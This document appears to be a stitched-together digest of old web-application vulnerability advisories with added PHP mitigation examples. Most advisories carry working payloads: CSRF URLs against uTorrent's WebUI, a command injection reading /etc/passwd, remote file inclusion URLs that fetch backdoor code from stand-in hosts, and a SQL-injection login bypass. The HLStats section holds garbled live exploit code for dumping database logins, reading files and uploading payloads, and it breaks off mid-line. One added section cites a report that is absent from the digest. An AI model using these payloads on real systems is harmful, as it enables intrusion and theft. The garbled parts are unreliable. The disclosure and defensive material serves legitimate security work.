uTorrent's WebUI is also affected: http://forum.utorrent.com/viewtopic.php?id=14565

force file download:
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent

utorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
After the username or password have been changed then the browser must re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1

So is Azureus's HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent
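The mitigation for the bug class in both the Surfboard and the BitTorrent-client reports above, written as an added example in PHP; this is not code from those products or from either advisory. The synchronizer-token pattern shown here, the form field name csrf_token, the session key and the restart_modem() stub are assumptions chosen for the example:

```php
<?php
// Added example (not from the advisories or any of the affected products):
// synchronizer-token protection for a state-changing POST handler such as
// "restart modem" or "add torrent". The field name, session key and the
// restart_modem() stub are assumptions made for this example.
declare(strict_types=1);

// One unpredictable token per session, reused by every form in that session.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every form that performs an action.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison. A cross-site page cannot read the victim's token,
// so an auto-submitted form arrives without it (or with a guess) and fails here.
function csrf_verify($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Independent second layer: when the browser sends Origin (or Referer) it must
// name this host. Requests carrying neither header pass this check, which is
// why the token above stays the primary control.
function same_origin(array $server): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($source === null) {
        return true;
    }
    $sourceHost = parse_url($source, PHP_URL_HOST);
    $ownHost    = parse_url('http://' . ($server['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    return is_string($sourceHost) && is_string($ownHost)
        && strcasecmp($sourceHost, $ownHost) === 0;
}

// Returns the HTTP status the handler would answer with.
function handle_restart_request(array $server, array $post): int
{
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return 405;   // actions never ride on GET links
    }
    if (!same_origin($server) || !csrf_verify($post['csrf_token'] ?? null)) {
        return 403;   // forged cross-site request rejected
    }
    restart_modem();  // assumed action, stubbed below
    return 200;
}

function restart_modem(): void
{
    // device-specific, out of scope for this example
}

// Self-check with constructed requests; no device and no real browser involved.
session_start();
$server = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => '192.168.100.1',
           'HTTP_ORIGIN' => 'http://attacker.invalid'];
echo handle_restart_request($server, []), PHP_EOL;                              // 403
$server['HTTP_ORIGIN'] = 'http://192.168.100.1';
echo handle_restart_request($server, ['csrf_token' => csrf_token()]), PHP_EOL; // 200
```

For devices and WebUIs that are reached by IP on a home network, the token is the control that actually stops a page on another site from submitting the form; the Origin check only narrows the window, and marking the session cookie SameSite adds a third layer in current browsers.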
etomite xss
Homepage: http://www.etomite.com/
Tested Version: 0.6.1 Final

Exploit:
http://localhost/etomite0614/index.php/%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E/fill

This is a flaw because $_SERVER['PHP_INFO'] is being trusted. $_SERVER['PHP_INFO'] will contain this value when the exploit url is used:
/index.php/"><script>alert("test")</script>/fill
/fill is removed.

Trust no one.

Michael Brooks
Re: Wordpress - Broken Access Control
Hi all,

Apparently there is some disagreement about this issue. I am providing more information to build a greater understanding about what is happening.

This problem is entirely contained within the query.php file. At the comment header of query.php it says: "The Big Query". Yes indeed this file produces a large query. This file is very disorganized and it was difficult to go through with a fine tooth comb, but I did and I found a flaw because of it. I was looking for SQL Injection, but broken access control will get me a CVE number.

Perhaps this URL provides more information:
http://localhost/wordpress/index.php/'wp-admin/

I urge everyone to make this GET request and to print the $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] variables. You will see that wp-admin/ is at the end of these variables.

I should have provided the exact point in which the flawed query is being built. I thought that my PoC was enough, my bad.

if ( is_admin() )
    $where .= " OR post_status = 'future' OR post_status = 'draft' OR post_status = 'pending'";

This url: http://localhost/wordpress/index.php/'wp-admin/ will cause the is_admin() function to return TRUE.

function is_admin () {
    global $wp_query;
    return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}

In the future you shouldn't attack someone who is trying to help. This is a complex and irregular issue so I totally understand why it was difficult to see. In the future you shouldn't dismiss something you do not understand; instead I urge you to ask questions and learn more.

Peace
Phpay - Local File Inclusion
By Michael Brooks
Vulnerability Type: Local File Inclusion
Software: Phpay
Homepage: http://sourceforge.net/projects/phpay/
Version Affected: 2.02.1

Phpay has been affected by multiple local file include flaws, as a result this patch was written:

$config = ereg_replace(":", "", $config);
$config = trim(ereg_replace("../", "", $config));
$config = trim(ereg_replace("/", "", $config));
if (($config == "") || (!eregi(".inc.php", $config))) { $config = "config.inc.php"; echo "<!--$config-->\n"; }
if (!file_exists($config)) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit; }
require("./$config");

To bypass this patch backslashes can be used instead of forward slashes on windows systems. Also .inc.php must exist *somewhere* in the string.

Local File Include for windows only:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
or if magic_quotes_gpc is turned on:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess

Remote code execution is accessible in the ./admin/ folder. The admin folder *should* be protected by a .htaccess file similar to osCommerce2.

Vulnerable configuration: There is a call to extract($_GET) so the exploit will work regardless of register_globals.

Using Linux is a very good fix for this issue.

Merry Christmas
Anon Proxy Server - Remote Code Execution
By Michael Brooks
Vulnerability type: Multiple Remote System command execution.
Software: Anon Proxy Server
Home page: http://sourceforge.net/projects/anonproxyserver/
Affects version: 0.100

Example exploit:
http://127.0.0.1/anon_proxy_server_0.100/diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23

A virtually identical flaw exists in diagconnect.php, however it takes longer to execute.

Anon Proxy Server forces magic_quotes_gpc=on, however magic_quotes_gpc does not protect the system() function from taint. For protection you should use the escapeshellarg() function. Removing diagdns.php and diagconnect.php is the best temporary solution. Also magic_quotes_gpc is being removed in php6, so Anon Proxy Server will have to revamp their security.

Peace
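The escapeshellarg() advice in the post above, carried through as an added PHP example; this is not Anon Proxy Server's diagdns.php and the function names are assumptions. It shows why magic_quotes_gpc does not help (the decoded payload still contains && and #), that host-name validation should reject the input before any shell is involved, and that escapeshellarg() is the second layer rather than the only one:

```php
<?php
// Added example, not Anon Proxy Server code: hardening a diagnostic page that
// shells out with a user-supplied host name. Function names are assumptions.
declare(strict_types=1);

// Primary control: accept only a syntactically valid host name, so shell
// metacharacters never reach the command line at all.
function valid_hostname(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    // FILTER_FLAG_HOSTNAME restricts labels to letters, digits and hyphens (PHP >= 7.0).
    return filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
}

// Secondary control: even a validated value goes through escapeshellarg(), which
// wraps it in single quotes and escapes embedded quotes, so the shell sees one
// literal argument. Returns null when the input is rejected.
function dns_lookup_command(string $host): ?string
{
    if (!valid_hostname($host)) {
        return null;
    }
    return 'host ' . escapeshellarg($host);
}

// Preferred fix for this particular page: no shell at all for a DNS lookup.
function dns_lookup_native(string $host): array
{
    if (!valid_hostname($host)) {
        return [];
    }
    return gethostbynamel($host) ?: [];
}

// Constructed inputs: a benign name and the URL-decoded payload from the
// advisory. magic_quotes_gpc would only prefix the quote with a backslash;
// the "&&" and "#" would still be interpreted by system().
$inputs = [
    'google.com',
    "google.com\\' && cat /etc/passwd #",
];
foreach ($inputs as $in) {
    $cmd = dns_lookup_command($in);
    printf("%-40s => %s\n", $in, $cmd ?? 'REJECTED by validation');
}
```

The second input is rejected by valid_hostname() and never reaches escapeshellarg(); if validation were skipped, escapeshellarg() would still turn it into a single quoted argument, but a quoted argument that is not a host name is a sign the request should be logged and dropped, not passed on.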
Oreon/Centreon - Multiple Remote File Inclusion
By Michael Brooks
Vulnerability Type: Multiple Remote File Inclusion.
Software: Oreon and Centreon
Homepage: http://www.oreon-project.org/ or http://www.centreon.com/
Versions: 1.4 (Oreon) and 1.4.1 (Centreon)

The vulnerable file is: ./oreon-1.4/www/include/monitoring/engine/MakeXML.php
Another, virtually identical RFI: ./oreon-1.4/www/include/monitoring/engine/MakeXML4statusCounter.php

The attack:
http://127.0.0.1/include/monitoring/engine/MakeXML.php?fileOreonConf=http://evilurl/backdoor.txt?
or
http://127.0.0.1/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://evilurl/backdoor.txt?

file MakeXML.php lines 42-43:
include_once($oreonPath . "www/oreon.conf.php");
include_once($oreonPath . "www/include/common/common-Func-ACL.php");

register_globals isn't needed for the taint:
file MakeXML.php line 28:
if (isset($_GET["fileOreonConf"])) $oreonPath = $_GET["fileOreonConf"];

However magic_quotes_gpc is required for LFI because you need a null byte.

Peace
PHP RPG - Sql Injection and Session Information Disclosure.
By Michael Brooks
Vulnerability: Sql Injection and Session Information Disclosure.
Homepage: http://sourceforge.net/projects/phprpg/
Version affected: 0.8.0

There are two flaws that affect this application.

A nearly vanilla login bypass issue affects phprpg. If magic_quotes_gpc=off then this will log an attacker in as the administrator using this:
username: 1'or 1=1 limit 1/*
password: 1
Keep in mind that magic_quotes_gpc is being removed in php6!

The second flaw allows an attacker to steal any session registered by phprpg by navigating to this directory:
http://localhost/phpRPG-0.8.0/tmp/
This is because phprpg has manually changed the directory using session_save_path() which is called in init.php on line 49.

Peace
Wordpress - Broken Access Control
By Michael Brooks
Vulnerability: Broken Access Control
Homepage: http://wordpress.org/download
Software: Wordpress
Version affected: 2.3.1 (Latest at the time of writing)

The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.

This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI'] has led to many xss flaws. Although an attacker shouldn't be able to control all $_SERVER variables, none of them should be trusted.

exploit:
http://localhost/wordpress/'wp-admin/

This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value: http://localhost/wordpress/'wp-admin/

Vulnerable function: line 34, in ./wp-includes/query.php.

function is_admin () {
    global $wp_query;
    return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));
}

The same flaw is duplicated again on line 645 of the same file.

This url: http://localhost/wordpress/'wp-admin/ will cause the is_admin() function to return true.

This flaw works regardless of register_globals or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created.

Peace
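The point shared by the Wordpress report above (and its follow-up earlier in this digest) and the etomite XSS report: strings under $_SERVER that are derived from the request line are attacker-influenced, so they are neither an authorization signal nor safe to reflect unencoded. An added PHP example, not Wordpress or etomite code; the session shape and the visible_statuses() rule are assumptions chosen to mirror the quoted query fragment:

```php
<?php
// Added example, not WordPress or etomite code. Contrasts the quoted
// REQUEST_URI string match with a privilege check based on the authenticated
// session, and encodes a $_SERVER-derived string before reflecting it.
// The $session array shape is an assumption made for this example.
declare(strict_types=1);

// The predicate quoted in the advisory: any request whose URI contains
// "wp-admin/" (case-insensitive) is treated as an admin request.
function is_admin_by_uri(string $requestUri): bool
{
    return stripos($requestUri, 'wp-admin/') !== false;
}

// Hardened predicate: privilege comes from the authenticated session only.
function is_admin_by_session(array $session): bool
{
    return ($session['authenticated'] ?? false) === true
        && in_array('administrator', $session['roles'] ?? [], true);
}

// Which post statuses a query may return; unpublished ones only for admins.
function visible_statuses(bool $admin): array
{
    $statuses = ['publish'];
    if ($admin) {
        $statuses = array_merge($statuses, ['future', 'draft', 'pending']);
    }
    return $statuses;
}

// A $_SERVER-derived string (PATH_INFO in the etomite report) that is
// reflected into HTML must be encoded on output.
function reflect_path(string $pathInfo): string
{
    return '<p>' . htmlspecialchars($pathInfo, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Constructed inputs modelled on the two advisories.
$craftedUri = "/wordpress/index.php/'wp-admin/";
$anonymous  = ['authenticated' => false, 'roles' => []];
$admin      = ['authenticated' => true, 'roles' => ['administrator']];

var_dump(is_admin_by_uri($craftedUri));       // bool(true): drafts leak to a visitor
var_dump(is_admin_by_session($anonymous));    // bool(false)
print_r(visible_statuses(is_admin_by_session($anonymous)));   // publish only
print_r(visible_statuses(is_admin_by_session($admin)));       // all four statuses
echo reflect_path('/"><script>alert("test")</script>/fill'), PHP_EOL;  // no live markup
```

The same reasoning applies to PHP_SELF and PATH_INFO: they are fine as routing input once validated, and must be encoded before reaching HTML, but a substring of any of them must never decide what a query is allowed to return.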
IceBB 1.0rc6 = Remote SQL Injection
[|Description:|]
A security breach has been discovered in IceBB 1.0-rc6. This breach is caused by bad filtering of the X-Forwarded-For variable:

./includes/functions.php, line 73
$ip = empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['REMOTE_ADDR'] : $_SERVER['HTTP_X_FORWARDED_FOR'];
$ip = $this->clean_key($ip);
$input['ICEBB_USER_IP'] = $ip;

./icebb.php, line 169
$icebb->client_ip = $input['ICEBB_USER_IP'];

./admin/index.php, line 112
$icebb->adsess = $db->fetch_result("SELECT adsess.*,u.id as userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE adsess.asid='{$icebb->input['s']}' AND adsess.ip='{$icebb->client_ip}' LIMIT 1");

A hacker could exploit this security breach in order to alter a SQL request.

[|Exploit:|]
http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.php

[|Solution:|]
None. Think about updating your forum core when a patch becomes available on the official website.

[|Credits:|]
Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com) for AeroX (AeroXteam.fr)

[|Greetz:|]
Math², KERNEL_ERROR, NeoMorphS, Snake91, Goundy, Alkino (...) And everybody from #aerox
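Both SQL injection reports above, the IceBB admin-session lookup keyed on a header-derived IP and the PHP RPG login bypass, have the same fix: parameterised queries, plus validating the IP before it is used at all. An added PHP example that is not IceBB or phpRPG code; it uses PDO with an in-memory SQLite database so it runs stand-alone, and the table layout, sample rows and trusted-proxy list are constructed for the example:

```php
<?php
// Added example, not IceBB or phpRPG code: the two queries from the advisories
// rebuilt with prepared statements, and a client-IP resolver that trusts
// X-Forwarded-For only behind a known proxy. Schema and rows are constructed.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT)');
$db->exec('CREATE TABLE adsess (asid TEXT, user TEXT, ip TEXT)');
$db->prepare('INSERT INTO users (username, pwhash) VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);
$db->prepare('INSERT INTO adsess VALUES (?, ?, ?)')->execute(['sid123', 'admin', '203.0.113.5']);

// X-Forwarded-For is client-supplied text. Honour it only when the request
// came from one of our own proxies, take the entry that proxy appended (the
// rightmost one), and require a syntactically valid IP either way.
function client_ip(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    $xff    = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff !== '' && in_array($remote, $trustedProxies, true)) {
        $hops = array_map('trim', explode(',', $xff));
        $candidate = end($hops);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '0.0.0.0';
}

// Admin-session lookup: values are bound, never interpolated into SQL.
function find_admin_session(PDO $db, string $asid, string $ip): ?array
{
    $st = $db->prepare('SELECT adsess.*, u.id AS userid FROM adsess
                        LEFT JOIN users AS u ON u.username = adsess.user
                        WHERE adsess.asid = :asid AND adsess.ip = :ip LIMIT 1');
    $st->execute([':asid' => $asid, ':ip' => $ip]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Login: look the user up by bound parameter, then verify the password hash.
// A quote or comment sequence in the username is just data here.
function login(PDO $db, string $username, string $password): bool
{
    $st = $db->prepare('SELECT pwhash FROM users WHERE username = ? LIMIT 1');
    $st->execute([$username]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['pwhash']);
}

// Constructed request: X-Forwarded-For carries a non-IP string and the request
// does not come from a trusted proxy, so REMOTE_ADDR is used instead.
$server = ['REMOTE_ADDR' => '198.51.100.7', 'HTTP_X_FORWARDED_FOR' => "' OR 1=1 -- "];
$ip = client_ip($server, ['10.0.0.1']);
var_dump($ip);                                        // "198.51.100.7"
var_dump(find_admin_session($db, 'sid123', $ip));     // NULL: IP does not match the session
var_dump(login($db, "1'or 1=1 limit 1/*", '1'));      // bool(false): the bypass string is a literal
var_dump(login($db, 'admin', 'correct horse'));       // bool(true)
```

Binding the values is what removes the injection; the IP validation is separate hygiene, since even a parameterised query will happily store whatever text a client puts in X-Forwarded-For if the application never checks it.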
Re: IceBB 1.0rc6 = Remote SQL Injection
correction [|Exploit:|] http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.txt
Re: MkPortal All Guests are Admin Exploit
Fixed In Mkportal version 1.1.1
MetaForum = 0.513 Beta - Remote file upload Vulnerability
[|Description:|]
A security bug has been discovered in MetaForum 0.513 Beta. This bug can be used by an attacker to upload a malicious php file on the server. During the upload, the MIME type of the file is the only verified parameter. The extension isn't. This enables an attacker to fake the MIME type of a php file so that it is considered as an image.

[|Exploit:|]
http://www.aeroxteam.fr/exploit-MetaForum-0.513b.txt

[|Solution:|]
Replace line 110 in the file usercp.php by:
if (($_FILES['imagefile']['type'] == "image/jpeg" || $_FILES['imagefile']['type'] == "image/pjpeg" || $_FILES['imagefile']['type'] == "image/png" || $_FILES['imagefile']['type'] == "image/gif") && in_array(strtolower(substr(strrchr($_FILES['imagefile']['name'], '.'), 1)), array('gif', 'jpg', 'jpeg', 'png')))

[|Credits:|]
Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com) for AeroX
NeoAlpha (AeroXteam.fr -- Neoalpha.fr)

[|Gr33tz:|]
Math², Syntax ERROR, Barma, NeoMorphS, Snake91, Spamm, Kad, Nitr0, Jethro And everybody from #aerox
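The proposed one-line fix above still trusts $_FILES[...]['type'], which the client sets. An added PHP example, not MetaForum code, showing the fuller check a practitioner would want: extension allowlist, server-side content sniffing with finfo, a decode check with getimagesize(), and a generated file name on disk. The ALLOWED map, the size limit and the constructed sample files are assumptions for the example; the 1x1 PNG bytes are a constructed test fixture:

```php
<?php
// Added example, not MetaForum code: validating an image upload without
// trusting the client-supplied MIME type. ALLOWED, the size limit and the
// sample files are constructed for this example.
declare(strict_types=1);

const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png', 'gif' => 'image/gif'];

// Returns [true, extension] or [false, reason]. Never consults $file['type'].
function validate_image_upload(array $file, int $maxBytes = 512 * 1024): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload error'];
    }
    if ($file['size'] > $maxBytes) {
        return [false, 'too large'];
    }
    // Only the last extension counts; "shell.php.jpg" is treated as jpg here and
    // then has to survive the content checks below.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return [false, 'extension not allowed'];
    }
    // Sniff the bytes on disk; a PHP script claiming image/jpeg fails here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        return [false, "content is $mime, expected " . ALLOWED[$ext]];
    }
    // Require the file to parse as an image as well.
    if (@getimagesize($file['tmp_name']) === false) {
        return [false, 'not a decodable image'];
    }
    return [true, $ext];
}

// Store under a random name so the client's filename never reaches the
// filesystem; the target directory must not be served with PHP execution.
function store_upload(array $file, string $dir): ?string
{
    [$ok, $info] = validate_image_upload($file);
    if (!$ok) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $info;
    return move_uploaded_file($file['tmp_name'], rtrim($dir, '/') . '/' . $name) ? $name : null;
}

// Constructed fixtures: a 1x1 PNG and a PHP script, both claiming image/jpeg.
const PNG_1X1 = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==';
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, base64_decode(PNG_1X1));
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'not an image'; ?>");

$cases = [
    ['name' => 'avatar.png',    'tmp_name' => $png],
    ['name' => 'shell.php',     'tmp_name' => $php],
    ['name' => 'shell.php.jpg', 'tmp_name' => $php],
];
foreach ($cases as $c) {
    $file = $c + ['type' => 'image/jpeg', 'error' => UPLOAD_ERR_OK, 'size' => filesize($c['tmp_name'])];
    [$ok, $info] = validate_image_upload($file);
    printf("%-14s => %s\n", $c['name'], $ok ? "accepted as .$info" : "rejected: $info");
}
unlink($png);
unlink($php);
```

Expected outcome: avatar.png is accepted, shell.php fails the extension check, and shell.php.jpg passes the extension check but is rejected because finfo reports its content as a script rather than image/jpeg. Serving the upload directory without script execution is what makes the remaining risk a content-delivery problem rather than code execution.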
Re: Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability
Could you please provide more details about this vulnerability? Especially which versions are affected :-)

Kind regards,
Marek Kroemeke
HLStats Remote SQL Injection Exploit
HLStats is more than 5 years old. HLStats has been downloaded more than 270,000 times from http://sf.net. Nothing more than absolutely benign XSS has been reported for this application, until NOW.

Merry Christmas,
--Michael Brooks

Homepage: http://sourceforge.net/projects/hlstats/

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

brb ?php /* Live Exploit Code SQL Inection + Path Disclosure Affects HLStats HLStats =1.34 and Hlstats = 1.20 works with magic_quotes_gpc=On by Michael Brooks */ print titleHLStats SQL Injection Exploit/title body bgcolor='#009900' font color='#FF' b/bbrbr centerb br Welcome To HLstats Exploit code.brbr /b/center br SQL Inection + Path Disclosurebr Affects Hlstats = 1.20 to HLStats =1.34(current)br Tested on Linux and Windowsbr works with magic_quotes_gpc=On!br HLStats has gone though 5 years with no exploits so this is a Birthday Present!br Merry Christmass!br By Michael Brooksbr br b/bbrbr ; print form action='.$_SERVER['PHP_SELF'].' method='post' bTarget:/bbr input type='text' name='target' size=32br (hint: where the login form is. example: http://domain.com/path/hlstats.php )br brbProxy:/b(ip:port or name:[EMAIL PROTECTED]:port)br input type='text' name='proxy' size=32br (example: 127.0.0.1:8118 Use a href='http://tor.eff.org'Tor/a+a href='http://www.privoxy.org/'Privoxy/a. )br brbr If nothing is changed below this line then the exploit will attempt to get the database login information in plain text. 
b/bbrbr H1ATTACKS:/H1 br bDatabase Selects:/bbr br OBTIAN HLStats logins:br input type='submit' name='button' value='HLStats_Logins'(Passwords are stored as MD5 hashs, use: a href='http://www.milw0rm.com/cracker/insert.php'Milw0rm's MD5 Cracker/a)br OBTIAN mysql.user logins:br input type='submit' name='button' value='Mysql_Logins'br br br bFile IO:/bbrbr bPath Disclosure/bbr input type='submit' name='button' value='Path'br br bPlain Text Database Login Information/bbr input type='submit' name='button' value='Read_Login' (This will attempt to read the configuration file for hlstats and dump the PLAIN TEXT database login information.)br br bRead Other File/bbr input type='submit' name='button' value='Read_File' input type='text' name='read_file' size=50 brexample: /etc/passwdbr OR for windows based systems: C:WINDOWSrepairsambr brbattempt payload:/b(WARNING, NO PROXY IS USED FOR UPLOADING PAYLOAD)br input type='submit' name='button' value='Upload' lt?php input type='text' name='payload' size=50?gt br example: system('netstat'); br /form brb/bbr ; //generic http class class http{ var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass=''; function http_gpc_send($loc ,$cookie=, $postdata = ) { //overload function polymorphism between gets and posts $url=parse_url($loc); if(!isset($url['port'])){ $url['port']=80; } //$ua=$_SERVER['HTTP_USER_AGENT']; $ua='GPC/.01'; if($this-proxy_ip!=''$this-proxy_port!=''){ $fp = pfsockopen( $this-proxy_ip, $this-proxy_port, $errno, $errstr, 120 ); $url['path']=$url['host'].':'.$url['port'].$url['path']; }else{ $fp = fsockopen( $url['host'], $url['port'], $errno, $errstr, 120 ); } if( !$fp ) { print $errstr ($errno)br\nn; } else { if( $postdata=='' ) { fputs( $fp, GET .$url['path'].?.$url['query']. HTTP/1.1\r\n ); } else { fputs( $fp, POST .$url['path'].?.$url['query']. 
HTTP/1.1\r\n ); } if($this-proxy_name!=''$this-proxy_pass!=''){ fputs($fp, Proxy-Authorization: Basic .base64_encode($this-proxy_name.:.$this-proxy_pass).\r\n\r\n); } fputs($fp, Host:
AROUNDMe 0.6.9 remote file inclusion
== AROUNDMe 0.6.9 remote file inclusion
vendor site: http://barnraiser.org/
vulnerable versions: 0.6.9 (and possibly older)
discovered by: noislet ( http://www.noislet.org/ )
vendor informed: 21.10.2006
published: 22.10.2006

== product info:
AROUNDMe is the perfect solution for you to bring people together around shared goals, activities and interests to form a shared knowledge network.

== bug details:
Input passed to $templatePath is not verified before being used to include files.
required: register_globals = On
file: pol_view.tpl.php (and others)
buggy code:
if (isset($poll)) {
...
include $templatePath . "poll_detail.inc.tpl.php";

== example exploitation:
http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=http://example.com/evilcode.php%00

--
noislet \ page http://www.noislet.org/
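Four reports in this digest share one root cause: a request-controlled string (page in PHPWebAdmin's index.php, config in Phpay, fileOreonConf in Oreon/Centreon, templatePath here in AROUNDMe) is used as, or as a prefix of, an include path, and the various string-stripping patches are bypassed with null bytes, backslashes or stream wrappers. One added PHP example covering all four, not code from any of those projects; the PAGES map, directory names and the constructed template file are assumptions for the example:

```php
<?php
// Added example, not the code of PHPWebAdmin, Phpay, Oreon/Centreon or
// AROUNDMe. Two safe ways to turn a request parameter into an include path:
// an allowlist, and a realpath() jail for directories too large to list.
// PAGES, the directory names and the sample template are assumptions.
declare(strict_types=1);

// 1) Allowlist: the parameter selects a key, never a path fragment.
const PAGES = ['frontpage' => 'hm_frontpage.php', 'domains' => 'hm_domains.php'];

function resolve_page(string $requested): ?string
{
    return PAGES[$requested] ?? null;
}

// 2) Jail: accept a single file-name segment, resolve it under a fixed base
// with realpath(), and require the result to be a plain file inside that base.
// Null bytes, "..", backslashes and wrappers such as http:// or php:// all
// fail one of these steps, so no blacklist of substrings is needed.
function resolve_under(string $base, string $requested): ?string
{
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9_.-]+\z/', $requested)) {
        return null;                       // exactly one segment, no separators
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($baseReal === false || $target === false) {
        return null;                       // does not exist
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                       // resolved outside the base ("..", ".")
    }
    return is_file($target) ? $target : null;
}

// 3) Include prefixes come from configuration that is assigned
// unconditionally, so neither register_globals nor extract($_GET) can
// pre-seed them before the include runs.
$config = [];
$config['includepath'] = __DIR__ . '/include/';   // never read from the request

// Self-check with a constructed template directory and the decoded inputs
// from the advisories above.
$dir = sys_get_temp_dir() . '/tpl_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/poll_detail.inc.tpl.php', '<?php // constructed template');

$inputs = [
    'poll_detail.inc.tpl.php',
    "background/../../../../../../../../boot.ini\0",
    'http://example.com/evilcode.php',
    'eregi.inc.php\\..\\admin\\.htaccess',
    '..',
];
foreach ($inputs as $in) {
    printf("%-48s => %s\n", json_encode($in), resolve_under($dir, $in) ?? 'REJECTED');
}
var_dump(resolve_page('frontpage'));                      // "hm_frontpage.php"
var_dump(resolve_page("background/../../Bin/x.INI\0"));   // NULL

unlink($dir . '/poll_detail.inc.tpl.php');
rmdir($dir);
```

Only the first input resolves; everything else is rejected before include is reached. Pair this with allow_url_include=Off (the default) so a wrapper cannot be reintroduced by a different code path, and treat any rejection here as something worth logging, since these parameters are not meant to be hand-edited by users.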